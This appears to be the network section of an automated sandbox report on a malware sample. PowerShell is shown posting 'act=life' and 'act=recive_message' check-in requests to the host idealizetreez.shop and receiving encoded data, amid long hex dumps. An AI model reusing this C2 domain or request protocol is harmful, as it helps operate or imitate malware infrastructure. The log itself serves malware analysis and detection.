                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: 94 81 44 36 ef e6 0d bb 9d 14 69 91 35 f0 60 90 d6 8f 74 99 44 47 6a 69 fe 9d 3e 3e 8d fc 45 e5 3e bb 1e 95 45 95 ca 61 fc df 69 d5 16 e2 d7 22 77 38 7f 26 8d e1 73 3e d2 89 17 22 22 59 52 fd 1a 7d fe d6 40 da a6 16 27 2f 68 0b e9 ee c2 db 73 a5 b0 3e bb 45 a8 4e bd ed ab d1 21 da 01 16 ee 8a b6 6d c0 40 83 ec 88 7c 1e 36 0d 59 9e c8 68 48 30 58 f6 89 ee 84 62 4f a9 d7 8f ff ca f0 2e 54 f2 6c c2 79 d5 18 f3 c6 45 6c 39 78 28 94 ef f6 3b a6 71 7d ff 68 a3 d6 28 b2 b6 78 b8 1d 37 b0 6d 79 ec 09 9e 04 96 c0 ae 82 27 52 22 85 4c 0a f2 50 f2 8e a4 f8 78 f1 20 5c 57 0a a1 57 12 0d be ef 69 8e 90 12 08 6d 3f 35 e4 37 b2 21 65 db 41 f5 2b a3 41 70 26 e5 a2 2a f5 51 f7 17 83 92 d7 cb b4 a0 e4 27 4e 4f d6 e9 e7 5b 08 4e 72 69 fe c4 79 25 8b c6 de f9 b0 1b 73 d1 ee
                                                                                            Data Ascii: D6i5`tDGji>>E>Eai"w8&s>""YR}@'/hs>EN!m@|6YhH0XbO.TlyEl9x(;q}h(x7my'R"LPx \WWim?57!eA+Ap&*Q'NO[Nriy%s
                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: 6e 8b 01 e8 bc 4f 8e e2 65 ce b1 53 83 4c ac e4 2c 40 f3 ec 8b 9a be 6a 88 69 0d d4 2a 8d 36 f8 01 ff 08 f8 20 db 8b cb a7 e2 d1 ca 4b c6 e3 e0 65 bf 57 f8 34 47 e8 77 54 ff a3 cf b1 58 45 91 11 ae a6 2d 7f 20 c7 7a e6 ab e9 64 ed db 54 05 85 0b 84 09 19 60 2b f3 d2 25 14 6a e8 ce 87 f1 84 64 7a f5 2f 27 ca 60 f8 6f d8 0a 84 5c c7 a1 40 68 24 e1 6b cd 5a b2 79 e2 ee c6 f5 6a b3 8b 95 da 7a d8 37 28 42 2e 31 05 8d ab d2 54 ed d7 0e 69 8b 2e bf 2a 40 66 66 6e c9 d6 30 7b b2 f9 ba 90 96 ee 24 31 4e 76 77 03 59 a3 e3 3b a9 78 98 43 06 a2 f1 27 17 4a d8 37 dd 95 ee 12 21 26 04 16 0d 89 cf 5c 1e 4c 38 9d c8 74 b8 fa 8e 69 42 05 94 3d bd 6b 23 2a aa 62 d9 7b 96 f2 93 96 ec 1d fb 06 2b 17 45 3f ab 50 93 3e 35 5d 10 3b b0 ee e6 d5 02 6f 3f 28 9f d2 db f3 ba ab bf
                                                                                            Data Ascii: nOeSL,@ji*6 KeW4GwTXE- zdT`+%jdz/'`o\@h$kZyjz7(B.1Ti.*@ffn0{$1NvwY;xC'J7!&\L8tiB=k#*b{+E?P>5];o?(
                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: df 8d 5e 75 98 68 4e f2 2f 59 de 45 57 4a 55 d6 48 86 4d 22 50 3e 71 10 03 05 e6 73 bb 2e cf ec 00 aa 43 9d b1 e7 4a e8 3d b7 b5 f7 5e 5a 3d d4 7d b8 b1 4f b0 2f d4 96 c4 9b 24 ef 3f da 16 e5 d9 42 43 53 02 56 83 cb bd 92 14 72 e8 1d 93 e0 d9 46 28 a4 be 7b b7 67 f2 72 a1 14 dd e2 36 01 7d dd 72 49 5f 6a 99 ec 2e 65 57 b4 e5 94 a0 cd 80 73 d5 cd 1c e4 9e dc 03 82 d4 cf 1a c6 d2 8f 6f ea 78 b0 1a 0b fc 1d 80 5f 8f 09 3c 74 6a 80 51 89 4b 5b 84 e7 da 07 6a be 11 95 ff 57 a3 73 f7 a7 82 0a 16 96 dc 90 ce b9 a3 19 db 6e c3 f8 9d 33 ba de 4e 18 34 8c 01 80 af cf f1 ac f6 06 b1 b4 5a 74 0d 33 50 dc d3 73 7f 07 d9 1b 8d ad ec 5c 46 53 c3 69 b5 a7 82 fc be 27 21 38 d6 f9 e6 b7 df e7 f6 ae 73 e1 98 73 bb dc 3e 70 42 c1 4d 5f ab 30 8e a0 f4 3a ab 20 05 e0 7a 6f 64
                                                                                            Data Ascii: ^uhN/YEWJUHM"P>qs.CJ=^Z=}O/$?BCSVrF({gr6}rI_j.eWsox_<tjQK[jWsn3N4Zt3Ps\FSi'!8ss>pBM_0: zod
                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: b7 53 48 10 ff 2d 7a f9 06 a7 ed 2c 0e 24 da 19 1d 70 70 e0 4d da 25 33 8f 0d 60 55 ae d5 fe d9 33 d8 c2 82 e0 b6 e1 3e cd 10 2f 3d e4 fd 3b f7 7c 41 73 86 94 df 74 ed 44 dc 6c 19 97 80 d1 7f 3c d4 cd 35 f7 4d bd b7 5e 98 e4 a5 1d 78 f9 59 dd 1f 0f 40 3a cd 9c 7b 75 f2 b9 f1 ff 8e da 0c ec db 07 d7 28 12 fd b3 9a 91 18 fa d0 5b 56 1c 08 fc e3 11 77 d7 ca 14 24 52 59 5f a4 79 be f6 a8 7e ba 89 43 21 21 8f bb d0 f2 94 cf 89 58 14 47 6a 23 06 d2 34 e6 a8 a1 a4 30 1a 39 7d 02 58 06 21 20 17 3b ec 4e bc 39 99 bc ce 38 4e 92 66 00 f3 01 6a 03 71 da a2 73 64 6d 92 11 0c b0 ff 41 54 b3 b8 04 a2 96 75 db 44 24 fe ac ce 6f 74 4d 01 b2 93 4c 7b 30 3f 12 78 84 e7 d4 77 18 93 70 ff b5 ad fc 14 b0 a3 4d f0 8f 9b 5c 3c 13 f9 42 fc e7 11 7a 76 c7 7b 5a 24 3d ce 30 88 8a
                                                                                            Data Ascii: SH-z,$ppM%3`U3>/=;|AstDl<5M^xY@:{u([Vw$RY_y~C!!XGj#409}X! ;N98NfjqsdmATuD$otML{0?xwpM\<Bzv{Z$=0
                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: e8 a0 5f 63 f4 36 aa 63 11 73 c0 f0 1e e6 da 29 2c 30 16 48 f3 d5 0c 15 4c c8 d7 15 be 8b ad 8e d5 68 c1 c4 63 80 3b f2 b0 63 c3 71 cc 49 29 9c 8a b3 58 87 72 de 1a 3f 5f 2c 7f cf 35 52 00 dc 99 b7 44 2d 67 12 e1 6f 06 64 3d 2d bb a9 39 69 b9 ac 11 b4 00 d7 b0 9b 15 34 88 d3 8c b8 db 3c ef e5 1e 42 6c f5 14 4d af 37 c2 8c ce 5b 67 95 5c a4 e3 6c d6 59 6a 71 f5 3d 83 71 7c 42 20 b1 d7 f2 63 2c 88 00 43 5d ac b7 9d ac 3b c5 4f 45 35 33 f4 db 9c d8 69 9f ff f1 c2 a2 35 cd f0 a6 5d 21 3a 43 ab ed 1c 9b 71 9d d8 a2 12 77 51 4b bc 72 4b 57 d4 1b 33 2d 71 6f 50 08 b2 27 30 ff dd 08 29 73 c0 70 52 33 36 71 71 9b f2 b2 0f 09 5a 84 70 1c 9c a4 e3 65 41 93 37 28 9e ff 71 86 97 02 b9 97 a3 cb 8a a0 0f 18 96 db 33 13 24 ed ad b7 e3 25 0b 01 e5 b0 97 dc 36 4e 1c 09 a5
                                                                                            Data Ascii: _c6cs),0HLhc;cqI)Xr?_,5RD-god=-9i4<BlM7[g\lYjq=q|B c,C];OE53i5]!:CqwQKrKW3-qoP'0)spR36qqZpeA7(q3$%6N
                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: 4b 47 05 a7 85 a9 09 2d 33 54 c0 ed 52 7f d1 e5 03 6f d5 13 73 fd 2d 4c bf 15 0d b1 42 0e 0c 3e 44 06 ca 6b 2f 36 31 5e 50 72 60 28 6d cb 9f b9 03 2e 73 97 22 0e 73 bc b0 ef 65 a5 fe d4 4d 38 72 52 83 b9 f0 76 4a ec e2 f1 0b c2 0b e4 09 97 d1 b2 86 0a 91 b8 f6 d0 5f b1 25 6c 2c 84 0e 71 eb 60 76 ae 79 79 34 ba 3f 93 17 00 6e 85 37 87 c7 b5 6d 9d 1e 0d e7 e8 28 30 43 05 0a e2 65 d9 c8 5a 2c 2d fd cb 12 a8 96 e6 43 66 b7 25 82 f7 c9 a4 ec 6e 0c 91 46 90 2f 8e 91 8a 11 f8 19 a7 bf c6 6b 07 0a ef d4 b9 70 44 80 3c 28 07 d1 eb 50 8d 3d 6e c0 82 cc ac b1 f1 42 60 1d 14 5a 86 4d 7c af 98 14 2d 09 5a 08 0e 65 68 40 07 6b c3 ad 56 57 0b 5c 49 5c b5 5c e6 c7 bc 34 2b b9 d1 0e 1e ca e2 d2 3f 67 ac 7c 96 fd e4 fd e5 f6 45 5c fa 23 df 74 10 f6 cf df bd 9d 3c a0 5f 86
                                                                                            Data Ascii: KG-3TRos-LB>Dk/61^Pr`(m.s"seM8rRvJ_%l,q`vyy4?n7m(0CeZ,-Cf%nF/kpD<(P=nB`ZM|-Zeh@kVW\I\\4+?g|E\#t<_
                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: 42 d8 e2 58 24 c2 16 62 ad 96 60 b6 2c 7d e5 31 cc 82 f1 8b a1 5a 6b b4 da 51 d5 41 3c 5d e4 40 fc d5 b5 88 52 53 82 c8 b6 84 4e 54 29 01 43 00 ca 69 ea 79 6e 17 74 48 04 34 c4 44 77 19 b0 30 84 50 9a c7 48 a9 0f b6 0b 15 b6 1d e0 b5 f2 22 e5 f7 cf ba 7c 99 38 1e da a9 66 04 dd 09 5d 61 c2 df 48 a1 2f 5e 44 0c 98 c1 27 52 2c c4 11 fc 22 81 4a 34 a8 ea cf 84 7a d6 0d 76 4b c6 f3 80 f8 0c 7e 21 75 f4 20 6f 20 8a ce 07 5d fd 6d b3 98 bb 79 64 93 c1 cb 1b 38 6e d2 04 7e a0 29 44 dc 3d 5d c7 cb 20 ba 1b 6f 92 38 27 c3 b5 97 34 1b 1d 8a ad f7 2c 27 c6 f9 5b 8e 11 f6 f0 c1 e3 df cf 05 54 35 6b a6 1f 4c ad 80 ad 2b e8 fb 02 3e 70 7e 20 6f dc 51 a3 22 ef 13 28 74 94 a2 a3 e7 90 24 aa 0e 95 4a f0 09 ed 78 24 2b 87 c1 b1 f6 89 c5 b8 ed d8 eb 19 4e 37 4a cc a1 d6 17
                                                                                            Data Ascii: BX$b`,}1ZkQA<]@RSNT)CiyntH4Dw0PH"|8f]aH/^D'R,"J4zvK~!u o ]myd8n~)D=] o8'4,'[T5kL+>p~ oQ"(t$Jx$+N7J
                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: 27 16 e6 3d 70 a4 18 cd 9f bd a0 b2 f5 08 62 b9 82 0c d2 66 c6 8c e5 c8 4f e8 bc ad cb 2f 63 c2 ee e3 ad 4e 19 b9 67 21 a0 28 0b 2f fe 22 08 c8 48 30 1a aa 6f 10 d1 15 1f c3 bf 9c 13 bc b5 8f 91 e4 2d 51 72 51 10 34 ca 93 a6 c1 41 62 4b ba bc 3c 4a f4 cb a3 1a e6 8d 64 66 dd 15 83 1c 91 45 24 4e c6 80 d8 fd 1a da d6 f3 5f d7 7c 03 1d ac 08 bf c1 04 5b 20 49 ae ec cc 96 53 e1 d8 5a f3 fa c4 17 1a bd a4 f2 14 23 13 ab 28 cb 8d 86 64 8c 08 a0 4a 59 dd 27 81 3d 25 e3 7b 0f e3 14 d0 22 a2 4a f0 ec c1 e6 f2 70 2b 3e 6a 83 48 68 13 57 f3 6e 89 9f 16 c3 02 10 19 79 0c 47 d2 b8 f6 44 5c e7 d9 2e 38 b2 67 0d 4f e8 57 1d bc b3 21 a8 67 ce 67 2d 0c 52 28 b2 f3 fc f3 32 4f f6 f1 df 92 87 c5 80 a9 19 54 92 3d 10 2f de 97 c4 64 d4 27 00 aa 00 c3 18 68 91 43 56 d9 fe 84
                                                                                            Data Ascii: '=pbfO/cNg!(/"H0o-QrQ4AbK<JdfE$N_|[ ISZ#(dJY'=%{"Jp+>jHhWnyGD\.8gOW!gg-R(2OT=/d'hCV


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.657621104.21.64.14436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:37 UTC265OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: idealizetreez.shop
                                                                                            2025-01-15 17:25:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
                                                                                            2025-01-15 17:25:38 UTC1134INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=29u9056fnr5prul6jjhktb9344; expires=Sun, 11 May 2025 11:12:17 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZxdEit8SwFb3iqhNaFVzDXbaY54zIWO9Lfjx%2FD0vP1gV6qfx%2FRox1obvlw8L6Arn%2Bq7GRb%2F084eqi1U%2F%2BHQZUpMBQwHixiGgktLPe2HW9rPKmsnx8HHHHZ16DHXFVgVYo7zZknA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 902790f0a87e7c6a-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2381&min_rtt=2038&rtt_var=1010&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1432777&cwnd=218&unsent_bytes=0&cid=20ca651acea07125&ts=490&x=0"
                                                                                            2025-01-15 17:25:38 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                            Data Ascii: 2ok
                                                                                            2025-01-15 17:25:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.657628104.21.64.14436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:38 UTC266OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 46
                                                                                            Host: idealizetreez.shop
                                                                                            2025-01-15 17:25:38 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 52 49 49 49 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--RIII&j=
                                                                                            2025-01-15 17:25:39 UTC1129INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=802nkaavidahvv1g8pm7ie3kdv; expires=Sun, 11 May 2025 11:12:18 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QD4InLL%2FswJd20SDbNur1sdpcwA4GJP00W5PHZOaPhZO4%2FfcKCQHCKck8TL%2FeJQDtJrOSG9d1Bhi5LyCbIT5CoQ9S36cQXP6mXrLrMhAa602QUik%2FHjqb3R2h6n4MvlImruiPJ0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 902790f6be387c6a-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2040&rtt_var=776&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=948&delivery_rate=1401151&cwnd=218&unsent_bytes=0&cid=4a5cf22d1ca4cd7f&ts=520&x=0"
                                                                                            2025-01-15 17:25:39 UTC240INData Raw: 34 36 62 0d 0a 56 6d 70 6c 73 32 72 52 37 4b 42 74 45 75 57 6c 4f 46 46 6d 7a 59 63 5a 33 32 51 43 66 7a 56 45 4d 71 62 67 34 4e 6e 67 54 79 41 74 53 42 4f 52 55 4f 58 41 67 68 35 33 78 35 39 4d 49 78 4f 6f 71 7a 75 2b 41 43 42 46 55 79 56 65 31 59 58 4d 2b 35 59 69 41 6d 77 4d 42 4e 38 5a 74 4d 43 43 43 47 72 48 6e 32 4d 71 52 4b 6a 70 4f 2b 56 47 5a 78 56 58 4a 56 37 45 67 59 75 32 6b 43 4e 44 50 67 59 43 32 77 2b 79 69 4d 45 42 66 34 44 41 58 54 41 4d 6f 2b 35 30 74 77 6b 67 55 78 63 68 53 49 54 61 77 70 53 46 4f 30 45 62 43 78 62 59 53 4b 7a 41 32 30 39 33 69 34 63 43 63 77 65 6f 35 58 57 35 41 47 6b 58 58 53 78 57 78 59 53 4b 71 59 6b 70 53 44 34 49 41 64 6f 46 75 35 7a 4d 43 33 69 4c 78 6c 63 77 52 4f 47
                                                                                            Data Ascii: 46bVmpls2rR7KBtEuWlOFFmzYcZ32QCfzVEMqbg4NngTyAtSBORUOXAgh53x59MIxOoqzu+ACBFUyVe1YXM+5YiAmwMBN8ZtMCCCGrHn2MqRKjpO+VGZxVXJV7EgYu2kCNDPgYC2w+yiMEBf4DAXTAMo+50twkgUxchSITawpSFO0EbCxbYSKzA2093i4cCcweo5XW5AGkXXSxWxYSKqYkpSD4IAdoFu5zMC3iLxlcwROG
                                                                                            2025-01-15 17:25:39 UTC898INData Raw: 6c 66 4b 56 47 4f 46 30 45 46 46 50 56 6b 35 65 32 6b 69 73 43 4b 30 59 65 6b 51 2b 2f 7a 70 70 50 65 49 76 4a 58 7a 41 4c 71 4f 52 37 72 77 6c 67 48 6c 38 75 56 4d 36 4e 6a 62 53 4d 4a 30 55 38 41 51 44 65 44 37 75 49 7a 51 77 77 79 59 64 64 4b 30 54 33 70 56 75 74 42 57 4d 4a 57 6a 63 51 32 38 79 62 2b 34 55 68 41 6d 78 49 41 64 38 4a 76 6f 37 51 42 33 75 4d 77 6b 67 34 44 61 4c 6f 65 37 41 4d 62 78 35 58 49 56 72 4f 6a 59 69 2f 6a 79 42 45 4e 41 68 48 6e 30 69 30 6c 6f 4a 58 4d 4b 54 43 53 6a 51 49 75 61 64 42 2f 52 6b 75 42 42 63 68 58 49 54 61 77 72 4f 48 4c 6b 45 2f 42 77 54 5a 41 36 47 4f 30 41 6c 39 67 74 56 63 4e 67 71 6c 35 6d 6d 33 43 47 59 65 58 69 31 5a 77 59 57 47 2b 38 78 74 52 53 78 49 58 35 45 70 76 6f 58 4f 42 57 65 48 68 30 56 39 48 65
                                                                                            Data Ascii: lfKVGOF0EFFPVk5e2kisCK0YekQ+/zppPeIvJXzALqOR7rwlgHl8uVM6NjbSMJ0U8AQDeD7uIzQwwyYddK0T3pVutBWMJWjcQ28yb+4UhAmxIAd8Jvo7QB3uMwkg4DaLoe7AMbx5XIVrOjYi/jyBENAhHn0i0loJXMKTCSjQIuadB/RkuBBchXITawrOHLkE/BwTZA6GO0Al9gtVcNgql5mm3CGYeXi1ZwYWG+8xtRSxIX5EpvoXOBWeHh0V9He
                                                                                            2025-01-15 17:25:39 UTC1369INData Raw: 34 35 32 39 0d 0a 72 64 62 6f 51 49 41 49 5a 50 78 44 44 6a 73 4c 6a 77 69 4a 4e 4f 77 41 48 30 41 79 2b 69 73 4d 43 66 49 37 45 56 6a 38 4d 6f 75 6c 2f 73 67 35 6f 48 6c 38 30 58 73 71 45 68 4c 75 48 62 51 78 30 44 78 2b 52 55 50 4f 71 7a 42 68 6b 6a 49 56 76 4d 41 71 68 34 6d 33 39 47 53 34 45 46 79 46 63 68 4e 72 43 74 59 38 6d 54 6a 4d 42 42 74 49 49 75 59 44 4e 42 58 69 50 78 31 63 79 44 36 66 6a 64 72 59 4a 62 78 70 66 4a 56 7a 42 6a 34 48 37 7a 47 31 46 4c 45 68 66 6b 53 32 39 6a 64 4d 65 4d 72 4c 45 56 44 30 44 75 61 56 6b 38 78 38 67 47 6c 74 6d 43 49 53 49 68 62 79 47 49 45 67 33 44 41 50 63 42 37 71 48 79 78 31 36 69 38 6c 49 50 67 36 71 36 33 65 34 43 57 41 63 56 69 68 61 7a 38 4c 4d 2b 34 55 31 41 6d 78 49 4b 4e 77 59 6f 59 54 4a 48 6a 4b 79
                                                                                            Data Ascii: 4529rdboQIAIZPxDDjsLjwiJNOwAH0Ay+isMCfI7EVj8Moul/sg5oHl80XsqEhLuHbQx0Dx+RUPOqzBhkjIVvMAqh4m39GS4EFyFchNrCtY8mTjMBBtIIuYDNBXiPx1cyD6fjdrYJbxpfJVzBj4H7zG1FLEhfkS29jdMeMrLEVD0DuaVk8x8gGltmCISIhbyGIEg3DAPcB7qHyx16i8lIPg6q63e4CWAcVihaz8LM+4U1AmxIKNwYoYTJHjKy
                                                                                            2025-01-15 17:25:39 UTC1369INData Raw: 54 33 70 56 53 2b 45 47 70 64 53 47 68 4a 68 49 57 4f 2b 39 70 74 53 44 67 4d 42 4e 30 42 76 34 50 44 43 33 65 4b 77 31 6f 31 41 71 72 6b 63 4c 55 4b 62 78 64 62 49 6c 7a 4e 68 49 36 34 67 53 73 43 65 6b 67 41 79 55 6a 72 7a 75 4d 43 65 34 76 48 57 53 49 44 37 36 73 37 73 77 42 67 58 51 38 77 51 4e 4f 46 6e 66 57 62 62 55 55 34 53 46 2b 52 41 71 47 4c 7a 41 74 36 67 73 4e 57 4f 51 53 71 39 33 4f 37 41 57 77 56 55 69 6c 57 77 59 2b 46 73 49 45 2f 55 44 63 4d 43 64 31 49 2f 63 37 46 46 7a 44 66 68 33 38 6b 42 37 2f 6a 65 50 30 5a 4c 67 51 58 49 56 79 45 32 73 4b 37 6a 43 46 4a 4d 77 4d 4d 31 51 79 7a 67 38 6b 42 66 6f 37 4c 55 6a 38 44 76 65 68 2b 74 51 78 70 47 46 73 72 55 39 61 42 67 2f 76 4d 62 55 55 73 53 46 2b 52 4c 34 43 35 34 55 39 76 79 64 34 61 4e
                                                                                            Data Ascii: T3pVS+EGpdSGhJhIWO+9ptSDgMBN0Bv4PDC3eKw1o1AqrkcLUKbxdbIlzNhI64gSsCekgAyUjrzuMCe4vHWSID76s7swBgXQ8wQNOFnfWbbUU4SF+RAqGLzAt6gsNWOQSq93O7AWwVUilWwY+FsIE/UDcMCd1I/c7FFzDfh38kB7/jeP0ZLgQXIVyE2sK7jCFJMwMM1Qyzg8kBfo7LUj8Dveh+tQxpGFsrU9aBg/vMbUUsSF+RL4C54U9vyd4aN
                                                                                            2025-01-15 17:25:39 UTC1369INData Raw: 37 6b 51 56 76 46 68 63 35 48 74 33 43 68 62 66 43 64 51 49 7a 41 41 2f 66 43 37 57 46 7a 67 4e 78 6a 73 46 66 4f 77 4f 67 34 6e 4b 36 42 6d 59 50 55 43 74 5a 78 49 6d 4c 73 59 59 73 53 58 52 47 52 39 59 51 38 39 61 43 50 58 65 52 31 31 6c 7a 47 2b 48 38 4f 37 6f 4b 49 45 55 58 4b 30 4c 46 68 35 43 2f 6a 53 5a 51 50 77 34 48 31 42 71 30 67 73 67 41 63 34 2f 4b 57 54 73 57 72 2b 68 37 72 78 52 6d 46 6c 6c 6d 48 6f 53 46 6d 76 76 61 62 58 4d 6a 41 30 66 4f 52 71 72 4f 78 51 4d 77 33 34 64 5a 4f 51 6d 68 39 33 2b 37 44 57 4d 54 58 79 4e 59 77 49 69 50 74 49 6b 6e 53 7a 77 49 43 4e 51 41 75 49 6a 4d 44 6e 61 4c 79 68 70 39 52 4b 6a 39 4f 2b 56 47 52 77 64 61 49 45 66 56 74 34 57 37 30 32 31 64 65 68 46 48 31 67 54 7a 31 6f 49 43 66 49 33 4b 58 7a 63 4d 71 4f
                                                                                            Data Ascii: 7kQVvFhc5Ht3ChbfCdQIzAA/fC7WFzgNxjsFfOwOg4nK6BmYPUCtZxImLsYYsSXRGR9YQ89aCPXeR11lzG+H8O7oKIEUXK0LFh5C/jSZQPw4H1Bq0gsgAc4/KWTsWr+h7rxRmFllmHoSFmvvabXMjA0fORqrOxQMw34dZOQmh93+7DWMTXyNYwIiPtIknSzwICNQAuIjMDnaLyhp9RKj9O+VGRwdaIEfVt4W7021dehFH1gTz1oICfI3KXzcMqO
                                                                                            2025-01-15 17:25:39 UTC1369INData Raw: 49 42 70 62 5a 67 69 45 6a 49 2b 39 67 79 78 4b 50 41 67 42 32 77 79 77 68 38 45 49 65 59 48 4d 57 54 6b 4c 71 4f 4e 2f 76 51 31 6e 45 31 45 6a 57 38 33 43 7a 50 75 46 4e 51 4a 73 53 43 48 79 47 71 47 38 7a 41 78 72 78 39 67 55 4b 6b 53 6f 36 54 76 6c 52 6d 73 56 57 44 52 56 7a 59 71 47 73 6f 49 70 53 44 6b 50 42 39 51 46 74 6f 72 4d 43 33 65 48 79 31 55 30 44 4b 44 68 65 37 4a 47 4c 6c 31 51 50 68 43 63 77 71 4b 77 6c 41 78 4d 50 78 70 48 7a 6b 61 71 7a 73 55 44 4d 4e 2b 48 56 44 6f 46 70 2b 74 33 74 51 4a 79 48 56 77 76 58 38 57 4e 67 72 69 44 4a 30 6f 6d 44 67 66 61 41 4c 53 47 78 67 46 69 68 73 67 61 66 55 53 6f 2f 54 76 6c 52 6c 45 4c 55 43 46 66 68 71 75 46 6f 49 4d 6e 51 54 38 45 52 38 35 47 71 73 37 46 41 7a 44 66 68 31 63 2f 43 61 76 33 64 37 30
                                                                                            Data Ascii: IBpbZgiEjI+9gyxKPAgB2wywh8EIeYHMWTkLqON/vQ1nE1EjW83CzPuFNQJsSCHyGqG8zAxrx9gUKkSo6TvlRmsVWDRVzYqGsoIpSDkPB9QFtorMC3eHy1U0DKDhe7JGLl1QPhCcwqKwlAxMPxpHzkaqzsUDMN+HVDoFp+t3tQJyHVwvX8WNgriDJ0omDgfaALSGxgFihsgafUSo/TvlRlELUCFfhquFoIMnQT8ER85Gqs7FAzDfh1c/Cav3d70
                                                                                            2025-01-15 17:25:39 UTC1369INData Raw: 32 5a 62 79 6f 65 44 74 34 67 71 54 43 59 4a 44 64 30 4a 74 49 6e 4a 48 58 75 56 7a 46 49 77 43 71 66 73 65 37 4d 47 59 52 42 58 5a 68 36 45 68 5a 72 37 32 6d 31 6e 46 78 38 52 32 30 71 51 6d 64 51 46 64 34 76 52 55 54 49 48 75 65 68 72 2f 55 67 67 44 46 41 33 45 4a 79 55 6b 71 79 46 4d 67 77 74 53 41 44 64 53 4f 76 4f 79 51 42 2b 69 73 78 65 4f 67 47 6e 35 6e 36 34 44 47 77 52 56 69 35 5a 7a 6f 65 48 76 59 67 75 54 44 73 4a 43 39 55 42 76 59 65 43 51 54 43 41 33 78 70 72 52 4a 6e 31 66 4b 55 4c 63 46 39 6c 4a 55 48 56 6c 34 2b 72 68 47 39 74 4e 77 51 45 31 41 2b 6a 7a 74 31 42 61 63 66 41 56 6e 4e 63 37 2b 56 2f 73 51 56 6e 45 31 67 72 58 38 4f 4a 6a 62 47 4d 50 30 30 78 41 41 76 5a 42 61 47 45 79 42 31 35 6a 73 70 55 4f 78 61 73 70 54 58 39 41 58 68 64
                                                                                            Data Ascii: 2ZbyoeDt4gqTCYJDd0JtInJHXuVzFIwCqfse7MGYRBXZh6EhZr72m1nFx8R20qQmdQFd4vRUTIHuehr/UggDFA3EJyUkqyFMgwtSADdSOvOyQB+isxeOgGn5n64DGwRVi5ZzoeHvYguTDsJC9UBvYeCQTCA3xprRJn1fKULcF9lJUHVl4+rhG9tNwQE1A+jzt1BacfAVnNc7+V/sQVnE1grX8OJjbGMP00xAAvZBaGEyB15jspUOxaspTX9AXhd
